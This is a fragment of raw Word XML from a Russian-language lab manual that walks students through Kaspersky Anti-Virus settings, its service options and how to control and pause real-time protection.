        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Объекты автозапуска</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008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109" name="Рисунок 109" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-19.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241" r:link="rId242">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9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к группе настроек </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. В ней собраны настройки всех остальных компонентов антивируса. При выделении пункта </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>крываются настройки уведомления пользователя о событиях в жизни антив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русной защиты компьютера (сообщать ли об обнаружении вируса, о прибл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жающемся окончании лицензии, о проблемах с обновлениями и др.), здесь можно настроить защиту паролем и разрешить или запретить внешнее управл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ние приложением.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Группа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> также включает такие важные подгруппы: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обновление</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - это непосредственно настройки обновления антивирусных баз: расписание обновления, какие базы загружать </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файлы данных</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - тут настраиваются параметры хранения отчетов и пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">чей статистики. Также тут настраиваются параметры </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Резервного хранилища</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Карантина</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка сети</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - тут собраны параметры слежения за сетевыми соед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нениями, общие для почтового и веб-антивирусов, какие порты контролировать и что делать при обнаружении попытки установить защищенное соединение. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В этой группе настроек определяются параметры внешнего вида программы: цветовая гамма, использовать ли анимацию значка в системной п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нели и др.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Изучите доступные настройки группы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и ее подгрупп, поочередно выделяя соответствующие пункты в дереве настроек</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008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110" name="Рисунок 110" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-20.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243" r:link="rId244">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9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отмена</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вернитесь в главное окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Каспе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Закройте интерфейс </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>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71" w:name="_Toc3811363"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 3. Постоянная защита</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>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Работу с постоянно защитой можно разделить на три части: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - она выполняется в одноименном окне и была рассмо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рена в предыдущем задании </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Управление</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - каждый компонент постоянной защиты можно при необходимости приостановить, а потом запустить. Эти действия выполняются в главном окне интерфейса (элементы управления дополнительно продублиров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ны в окне статистики) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обслуживание</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, то есть работу со статистикой. Выполняется в окне статистики</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 этом задании нужно изучить последние две задачи: управление комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нентами постоянной защиты и работу с отчетами. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте главное окно интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="Рисунок 111" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-21.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId245">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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к разделу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, выделив одноименный пункт </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">При вызове интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> через системное меню </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> или щелчком по иконке, по умолчанию выбран пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</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заголовке этой части видна надпись </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="868680" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="Рисунок 112" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-22.jpg"/>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868680" cy="129540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Это означает, что з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щита включена и работает. Соответственно, в расположенной справа от нее группе управляющих кнопок (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="388620" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113" name="Рисунок 113" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-23.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId248" r:link="rId249">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="388620" cy="129540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) элемент </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="129540" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="Рисунок 114" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-24.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250" r:link="rId25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6E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) не активен. Остальные два элемента соответствуют паузе (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="144780" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115" name="Рисунок 115" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-25.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252" r:link="rId253">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sidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) и остановке</w:t>
      </w:r>
      <w:hyperlink r:id="rId254" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>1)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116" name="Рисунок 116" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-26.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255" r:link="rId256">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="152400" cy="129540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) проверки в режиме р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ального времени.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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пауза</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="144780" cy="129540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="Рисунок 117" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-27.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252" r:link="rId257">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sidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</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83280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118" name="Рисунок 118" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-28.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId258">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4579620" cy="338328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В общем случае приостанавливать или останавливать работу защ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ты не рекомендуется. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
